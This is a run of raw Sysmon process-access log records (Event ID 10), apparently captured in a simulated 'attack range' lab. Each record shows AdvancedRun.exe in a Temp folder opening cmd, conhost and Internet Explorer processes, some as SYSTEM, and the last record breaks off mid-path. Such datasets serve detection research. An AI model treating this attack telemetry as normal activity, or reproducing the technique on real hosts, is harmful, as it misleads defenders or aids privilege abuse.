10341000x80000000000000004077897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.